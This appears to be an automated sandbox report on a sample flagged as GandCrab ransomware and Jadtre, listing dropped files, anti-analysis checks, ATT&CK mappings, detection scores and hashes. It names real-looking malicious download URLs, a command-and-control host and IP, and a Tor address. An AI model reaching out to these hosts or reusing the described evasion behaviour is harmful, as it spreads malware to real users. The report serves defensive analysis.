                        C:\Program Files (x86)\microsoft office\Office16\DCF\SPREADSHEETCOMPARE.EXE
                        C:\Program Files (x86)\microsoft analysis services\AS OLEDB\110\SQLDumper.exe
                        C:\Program Files (x86)\microsoft office\Office16\VPREVIEW.EXE
                        C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\reader_sl.exe
                        C:\Program Files (x86)\autoit3\Aut2Exe\upx.exe
                        C:\Program Files (x86)\google\Update\1.3.36.131\GoogleUpdateSetup.exe
                        C:\Program Files (x86)\microsoft office\Office16\msotd.exe
                        C:\Program Files (x86)\java\jre1.8.0_211\bin\orbd.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe | System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe | System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe | File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exe | File created: C:\Users\user\AppData\Local\Temp\vSQshX.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe | File created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

                    Hooking and other Techniques for Hiding and Protection

                    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 799
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 799
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcess
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeCode function: 1_2_00C21718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00C21754h
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeCode function: EnumDeviceDrivers,K32EnumDeviceDrivers,VirtualAlloc,K32EnumDeviceDrivers,K32GetDeviceDriverBaseNameW,lstrcmpiW,VirtualFree,VirtualFree,
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeCode function: 0_2_0F396A40 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeCode function: 0_2_0F396C90 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeCode function: 1_2_00C229E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpi,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpi,FindNextFileA,FindClose,
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeCode function: 1_2_00C22B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeSystem information queried: ModuleInformation
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeFile opened: C:\ProgramData\Application Data\Application Data\Application Data\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeFile opened: C:\ProgramData\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeFile opened: C:\ProgramData\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeFile opened: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeFile opened: C:\ProgramData\Application Data\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeFile opened: C:\ProgramData\Application Data\Application Data\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
                    Source: Amcache.hve.1.drBinary or memory string: VMware
                    Source: Amcache.hve.1.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                    Source: Amcache.hve.1.drBinary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                    Source: Amcache.hve.1.drBinary or memory string: VMware Virtual USB Mouse
                    Source: Amcache.hve.1.drBinary or memory string: VMware-42 35 9c fb 73 fa 4e 1b-fb a4 60 e7 7b e5 4a ed
                    Source: Amcache.hve.1.drBinary or memory string: VMware, Inc.
                    Source: Amcache.hve.1.drBinary or memory string: VMware Virtual disk SCSI Disk Devicehbin
                    Source: Amcache.hve.1.drBinary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.1.drBinary or memory string: VMware7,1
                    Source: Amcache.hve.1.drBinary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.1.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: Amcache.hve.1.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: Amcache.hve.1.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: Amcache.hve.1.drBinary or memory string: VMware, Inc.me
                    Source: Amcache.hve.1.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                    Source: Amcache.hve.1.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.18227214.B64.2106252220,BiosReleaseDate:06/25/2021,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: Amcache.hve.1.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeCode function: 0_2_0F398150 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeCode function: 0_2_0F395210 lstrlenA,VirtualAlloc,CryptStringToBinaryA,_memset,lstrlenA,lstrlenA,lstrlenA,VirtualAlloc,lstrcpyA,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,VirtualFree,GetLastError,
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeCode function: 0_2_0F3A6044 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeCode function: 0_2_0F395EC0 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeProcess queried: DebugPort
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeCode function: 0_2_0F393AA0 AllocateAndInitializeSid,GetModuleHandleA,GetProcAddress,FreeSid,
                    Source: SciTE.exe.1.drBinary or memory string: GShift+Alt+KeypadPlusMinusDecimalDivideMultiplyLeftRightUpDownInsertEndEnterSpaceEscapeWinMenuPLAT_WINPLAT_WINNTPropertiesEmbeddedtoolbar.largeACCELSSciTESciTEWindowSciTEWindowContentlatin1latin2big5gbkshift_jiseuc-krcyrilliciso-8859-5iso8859-111250windows-1251translation.encodingSciTE_HOMESciTE_USERHOMEUSERPROFILEHHCTRL.OCXHtmlHelpWRich Text FormatShell_TrayWndButtonfull.screen.hides.menuEditcmd.exe /c
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeCode function: 0_2_0F3990A0 cpuid
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeCode function: 1_2_00C21718 GetSystemTimeAsFileTime,SHSetValueA,SHGetValueA,__aulldiv,__aulldiv,
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeCode function: 1_2_00C2139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeCode function: 0_2_0F397330 VirtualAlloc,VirtualAlloc,GetUserNameW,VirtualAlloc,GetComputerNameW,wsprintfW,VirtualAlloc,wsprintfW,VirtualAlloc,RegOpenKeyExW,RegQueryValueExW,GetLastError,RegCloseKey,VirtualFree,VirtualAlloc,VirtualAlloc,wsprintfW,RegOpenKeyExW,RegQueryValueExW,GetLastError,RegCloseKey,lstrcmpiW,wsprintfW,VirtualFree,VirtualAlloc,VirtualAlloc,wsprintfW,GetNativeSystemInfo,VirtualAlloc,wsprintfW,ExitProcess,wsprintfW,VirtualAlloc,VirtualAlloc,GetWindowsDirectoryW,GetVolumeInformationW,lstrlenW,wsprintfW,lstrcatW,lstrcatW,GetModuleHandleW,GetProcAddress,lstrlenW,VirtualFree,lstrcatW,VirtualAlloc,GetDriveTypeW,lstrcatW,lstrcatW,lstrcatW,GetDiskFreeSpaceW,lstrlenW,wsprintfW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,VirtualFree,
                    Source: Amcache.hve.1.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                    | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
                    |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
                    | Valid Accounts | Native API (12) | Path Interception | Access Token Manipulation (1) | Obfuscated Files or Information (2) | Input Capture (21) | System Time Discovery (11) | Taint Shared Content (1) | Archive Collected Data (11) | Exfiltration Over Other Network Medium | Ingress Tool Transfer (2) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Data Encrypted for Impact (1) |
                    | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Process Injection (2) | Software Packing (3) | LSASS Memory | Account Discovery (1) | Remote Desktop Protocol | Input Capture (21) | Exfiltration Over Bluetooth | Encrypted Channel (2) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
                    | Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Masquerading (1) | Security Account Manager | System Network Connections Discovery (1) | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Standard Port (11) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
                    | Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Virtualization/Sandbox Evasion (1) | NTDS | File and Directory Discovery (3) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Application Layer Protocol (2) | SIM Card Swap | | Carrier Billing Fraud |
                    | Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Access Token Manipulation (1) | LSA Secrets | System Information Discovery (46) | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol (12) | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
                    | Replication Through Removable Media | Launchd | Rc.common | Rc.common | Process Injection (2) | Cached Domain Credentials | Security Software Discovery (131) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Proxy (1) | Jamming or Denial of Service | | Abuse Accessibility Features |
                    | External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | Virtualization/Sandbox Evasion (1) | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |
                    | Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | Process Discovery (2) | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue |
                    | Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | System Owner/User Discovery (1) | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction |
                    | Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | Remote System Discovery (1) | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact |
                    | Source | Detection | Scanner | Label |
                    |---|---|---|---|
                    | SY5DeZW6pz.exe | 81% | Virustotal | |
                    | SY5DeZW6pz.exe | 66% | Metadefender | |
                    | SY5DeZW6pz.exe | 95% | ReversingLabs | Win32.Ransomware.GandCrab |
                    | SY5DeZW6pz.exe | 100% | Avira | W32/Jadtre.B |
                    | SY5DeZW6pz.exe | 100% | Joe Sandbox ML | |
                    | Source | Detection | Scanner | Label |
                    |---|---|---|---|
                    | C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe | 100% | Avira | W32/Jadtre.B |
                    | C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | 100% | Avira | W32/Jadtre.B |
                    | C:\Users\user\AppData\Local\Temp\vSQshX.exe | 100% | Avira | TR/Dldr.Small.Z.haljq |
                    | C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe | 100% | Joe Sandbox ML | |
                    | C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | 100% | Joe Sandbox ML | |
                    | C:\Users\user\AppData\Local\Temp\vSQshX.exe | 100% | Joe Sandbox ML | |
                    | C:\Users\user\AppData\Local\Temp\vSQshX.exe | 76% | Metadefender | |
                    | C:\Users\user\AppData\Local\Temp\vSQshX.exe | 100% | ReversingLabs | Win32.Trojan.Skeeyah |
                    | Source | Detection | Scanner | Label |
                    |---|---|---|---|
                    | 1.0.vSQshX.exe.c20000.3.unpack | 100% | Avira | W32/Jadtre.D |
                    | 0.2.SY5DeZW6pz.exe.3760000.0.unpack | 100% | Avira | W32/Jadtre.B |
                    | 0.2.SY5DeZW6pz.exe.f390000.1.unpack | 100% | Avira | W32/Jadtre.B |
                    | 1.0.vSQshX.exe.c20000.0.unpack | 100% | Avira | W32/Jadtre.D |
                    | 1.2.vSQshX.exe.c20000.0.unpack | 100% | Avira | W32/Jadtre.D |
                    | 0.0.SY5DeZW6pz.exe.3760000.2.unpack | 100% | Avira | W32/Jadtre.B |
                    | 1.0.vSQshX.exe.c20000.1.unpack | 100% | Avira | W32/Jadtre.D |
                    | 0.0.SY5DeZW6pz.exe.f390000.3.unpack | 100% | Avira | W32/Jadtre.B |
                    | 0.0.SY5DeZW6pz.exe.f390000.1.unpack | 100% | Avira | W32/Jadtre.B |
                    | 0.0.SY5DeZW6pz.exe.f390000.0.unpack | 100% | Avira | W32/Jadtre.B |
                    | Source | Detection | Scanner | Label |
                    |---|---|---|---|
                    | ddos.dnsnb8.net | 6% | Virustotal | |
                    | Source | Detection | Scanner | Label |
                    |---|---|---|---|
                    | http://ddos.dnsnb8.net:799/cj//k3.rar% | 100% | Avira URL Cloud | malware |
                    | http://gdcbghvjyqy7jclk.onion/3a23db8448d3b2b | 0% | URL Reputation | safe |
                    | http://www.develop.comYann | 0% | URL Reputation | safe |
                    | http://ddos.dnsnb8.net:799/cj//k3.rar | 7% | Virustotal | |
                    | http://ddos.dnsnb8.net:799/cj//k3.rar | 100% | Avira URL Cloud | malware |
                    | http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE | 0% | Avira URL Cloud | safe |
                    | http://www.baanboard.comPraveen | 0% | URL Reputation | safe |
                    | http://ddos.dnsnb8.net:799/cj//k2.rar% | 100% | Avira URL Cloud | malware |
                    | http://ddos.dnsnb8.net:799/cj//k2.rar | 100% | Avira URL Cloud | malware |
                    | http://www.activestate.comJames | 0% | URL Reputation | safe |
                    | http://ddos.dnsnb8.net/& | 100% | Avira URL Cloud | malware |
                    | http://www.develop.com | 0% | URL Reputation | safe |
                    | http://www.spaceblue.comDenis | 0% | URL Reputation | safe |
                    | http://ddos.dnsnb8.net:799/cj//k1.rar | 0% | URL Reputation | safe |
                    | http://www.spaceblue.com | 0% | URL Reputation | safe |
                    | http://www.rftp.comSteve | 0% | URL Reputation | safe |
                    | http://www.baanboard.com | 0% | URL Reputation | safe |
                    | http://www.scintila.org/scite.rng | 0% | URL Reputation | safe |
                    | https://tox.chat/download.html | 0% | URL Reputation | safe |
                    | Name | IP | Active | Malicious | Antivirus Detection | Reputation |
                    |---|---|---|---|---|---|
                    | ddos.dnsnb8.net | 63.251.106.25 | true | true | | unknown |
                    | Name | Malicious | Antivirus Detection | Reputation |
                    |---|---|---|---|
                    | http://ddos.dnsnb8.net:799/cj//k2.rar | true | Avira URL Cloud: malware | unknown |
                    | http://ddos.dnsnb8.net:799/cj//k1.rar | true | URL Reputation: safe | unknown |
                    | Name | Source | Malicious | Antivirus Detection | Reputation |
                    |---|---|---|---|---|
                    | http://ddos.dnsnb8.net:799/cj//k3.rar% | vSQshX.exe, 00000001.00000002.359919761.000000000142E000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown |
                    | http://gdcbghvjyqy7jclk.onion/3a23db8448d3b2b | SY5DeZW6pz.exe | true | URL Reputation: safe | unknown |
                    | http://www.activestate.com | SciTE.exe.1.dr | false | | high |
                    | http://www.develop.comYann | SciTE.exe.1.dr | false | URL Reputation: safe | unknown |
                    | http://ddos.dnsnb8.net:799/cj//k3.rar | vSQshX.exe, 00000001.00000002.360215641.00000000030C9000.00000004.00000010.00020000.00000000.sdmp | true | 7%, Virustotal; Avira URL Cloud: malware | unknown |
                    | http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE | vSQshX.exe, 00000001.00000003.310095902.00000000014B0000.00000004.00001000.00020000.00000000.sdmp, vSQshX.exe, 00000001.00000000.331514201.0000000000C23000.00000002.00000001.01000000.00000004.sdmp | false | Avira URL Cloud: safe | low |
                    | http://www.baanboard.comPraveen | SciTE.exe.1.dr | false | URL Reputation: safe | unknown |
                    | http://upx.sf.net | Amcache.hve.1.dr | false | | high |
                    | http://www.rftp.com | SciTE.exe.1.dr | false | | high |
                    | https://www.torproject.org/ | SY5DeZW6pz.exe | false | | high |
                    | http://ddos.dnsnb8.net:799/cj//k2.rar% | vSQshX.exe, 00000001.00000000.333684475.000000000142E000.00000004.00000020.00020000.00000000.sdmp, vSQshX.exe, 00000001.00000000.336367143.000000000142E000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown |
                    | http://www.scintilla.org | SciTE.exe.1.dr | false | | high |
                    | http://www.activestate.comJames | SciTE.exe.1.dr | false | URL Reputation: safe | unknown |
                    | http://ddos.dnsnb8.net/& | vSQshX.exe, 00000001.00000000.333684475.000000000142E000.00000004.00000020.00020000.00000000.sdmp, vSQshX.exe, 00000001.00000000.336367143.000000000142E000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown |
                    | http://www.develop.com | SciTE.exe.1.dr | false | URL Reputation: safe | unknown |
                    | http://www.lua.org | SciTE.exe.1.dr | false | | high |
                    | http://www.spaceblue.comDenis | SciTE.exe.1.dr | false | URL Reputation: safe | unknown |
                    | http://www.spaceblue.com | SciTE.exe.1.dr | false | URL Reputation: safe | unknown |
                    | http://www.rftp.comSteve | SciTE.exe.1.dr | false | URL Reputation: safe | unknown |
                    | http://www.baanboard.com | SciTE.exe.1.dr | false | URL Reputation: safe | unknown |
                    | http://www.scintila.org/scite.rng | SciTE.exe.1.dr | false | URL Reputation: safe | unknown |
                    | http://www.autoitscript.com/autoit3/scite | SciTE.exe.1.dr | false | | high |
                    | https://tox.chat/download.html | SY5DeZW6pz.exe | false | URL Reputation: safe | unknown |
                    | IP | Domain | Country | ASN | ASN Name | Malicious |
                    |---|---|---|---|---|---|
                    | 63.251.106.25 | ddos.dnsnb8.net | United States | 29791 | VOXEL-DOT-NETUS | true |

                    Private IP: 192.168.2.1
                    Joe Sandbox Version: 35.0.0 Citrine
                    Analysis ID: 694552
                    Start date and time: 2022-08-31 23:40:23 +02:00
                    Joe Sandbox Product: CloudBasic
                    Overall analysis duration: 0h 8m 21s
                    Hypervisor based Inspection enabled: false
                    Report type: light
                    Sample file name: SY5DeZW6pz.exe
                    Cookbook file name: default.jbs
                    Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Number of new started processes analysed: 22
                    Number of new started drivers analysed: 0
                    Number of existing processes analysed: 0
                    Number of existing drivers analysed: 0
                    Number of injected processes analysed: 0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                    Analysis Mode: default
                    Analysis stop reason: Timeout
                    Detection: MAL
                    Classification: mal100.rans.spre.troj.evad.winEXE@7/17@1/2
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HDC Information:
                                  • Successful, ratio: 93.8% (good quality ratio 88.6%)
                                  • Quality average: 80.1%
                                  • Quality standard deviation: 26.7%
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 0
                                  • Number of non-executed functions: 0
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Adjust boot time
                                  • Enable AMSI
                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                  • Excluded IPs from analysis (whitelisted): 20.189.173.22, 20.42.65.92
                                  • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, login.live.com, eudb.ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, arc.msn.com
                    • Not all processes were analyzed; the report is missing behavior information
                                  • Report size getting too big, too many NtOpenFile calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
Time:23:41:40
Type:API Interceptor
Description:2x Sleep call for process: WerFault.exe modified
                                  Process:C:\Users\user\AppData\Local\Temp\vSQshX.exe
                                  File Type:MS-DOS executable
                                  Category:dropped
                                  Size (bytes):19456
                                  Entropy (8bit):6.59099388193422
                                  Encrypted:false
                                  SSDEEP:384:1FqSuXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:rqQGPL4vzZq2o9W7GsxBbPr
                                  MD5:0D923288354DF40E2DA5BAACB10C3FC9
                                  SHA1:E407607B12D979CE65E5EA9EE46595ADD2A20593
                                  SHA-256:454BB82D16655E32EC8A6D4AAA3A8CF4774A71C92E03AB9F1016BD120CA1B74E
                                  SHA-512:2CEAF6F9B2080FE2A7C261EDF30165492EEDB0AB5DD8D3007DD3C531AB69D120AD9A4EAA2D8E7A27E053F68A37B5D9B3A87A6309A36E1251327CA10167D4115B
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  Reputation:low
                                  Preview:MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................
                                  Process:C:\Users\user\AppData\Local\Temp\vSQshX.exe
                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):1273856
                                  Entropy (8bit):6.69023953264788
                                  Encrypted:false
                                  SSDEEP:24576:07GO7dtrjrICw9XuXo7beSTdt5xbX02uvfTXfBxrj3d5E/jKQvVj4YpdjYY0td78:1EtnrICSooGSTD5xbX022fjBxrj3
                                  MD5:DD35F52225719254572E087F6E0FEC59
                                  SHA1:7F4D5FBDB477B008F4D1FAC11043AD5257CAF7C1
                                  SHA-256:0B9CEF4853588126D63E8639199CC76A1D1BF673769F0E75AE26B32908AAD956
                                  SHA-512:D9ED182CA6C59FBA74A57FF2105B38E87AF892D518ECE98452B5FE546532ED1ACC77186478600F0F4AC97BABA43C4616BCAD5403C4E0CB81A9B050DDC747C5F7
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  Reputation:low
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<.._].._].._]..R. ..]..R....]..R.!.L\..V%B.\]..V%R.F].._]...\....$.=]......^]..R...^].._]V.^]......^]..Rich_]..........................PE..L....r.Z.................*...l....................@................................................................. ...............................................................................@...@............................................text...(........................... ..`.rdata..............................@..@.data...<...........................@....rsrc................J..............@..@...r.uO..P.......B.................. ...................................................................................................................................................................................................................................................................................................
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):65536
                                  Entropy (8bit):0.8704783848702043
                                  Encrypted:false
                                  SSDEEP:96:hUFoi8KlIqh6oI7RC6tpXIQcQvc6QcEDMcw3DL+HbHg/8BRTf3o8Fa9iVf9Tx+id:eitAqHBUZMXoj+V/u7sxeS274It5
                                  MD5:D3380E9EC8451D197A6A9C368BDD3F07
                                  SHA1:7AB48DDA2C097EF637E3737FEC39FEC6AE36E866
                                  SHA-256:A8527F9F7090AEA42F9624EC29330C65FC2478283AC1906A2F8C7C5B4FD01EEA
                                  SHA-512:D0296EE4301237AB22C5AFD255CD904C258C4D8381566B38E448606637B3202C237F659F6324499D5F62B587C793A2BB32B720DBC7B957E5A6F3E8429F9183C1
                                  Malicious:true
                                  Reputation:low
